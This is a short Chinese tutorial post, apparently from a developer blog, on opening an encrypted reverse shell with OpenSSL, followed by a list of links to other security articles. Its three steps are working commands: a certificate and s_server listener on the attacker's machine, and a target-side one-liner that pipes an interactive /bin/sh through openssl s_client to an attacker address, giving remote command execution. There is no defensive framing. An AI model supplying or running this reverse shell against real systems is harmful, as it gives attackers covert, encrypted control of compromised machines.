使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
内心如初2 小时前
02_等保系列之标准体系和主要标准
网络安全·等保测评·等保测评从0-1·等保测评笔记
heze093 小时前
sqli-labs-Less-14自动化注入方法
mysql·网络安全·自动化
Bruce_Liuxiaowei3 小时前
如何彻底禁用 Windows Defender(附安全模式终极方案)
windows·安全·网络安全·内网渗透
海星船长丶4 小时前
Phar漏洞,PHP_filter,文件包含漏洞,include结合phar
网络安全·php·信息与通信
heze094 小时前
sqli-labs-Less-15自动化注入方法
mysql·网络安全·自动化
芥子沫5 小时前
iStoreOS_24.10.4 兼容性列表及镜像下载地址&更新日志
网络安全·软路由·istoreos
枫叶丹45 小时前
【Qt开发】Qt系统(七)-> Qt网络安全
c语言·开发语言·c++·qt·网络安全
Ancelin安心16 小时前
kali-dirsearch的使用
linux·运维·服务器·python·计算机网络·web安全·网络安全
HarmonLTS1 天前
Python Socket网络通信详解
服务器·python·网络安全
大方子1 天前
商城修改金额支付漏洞
网络安全·好靶场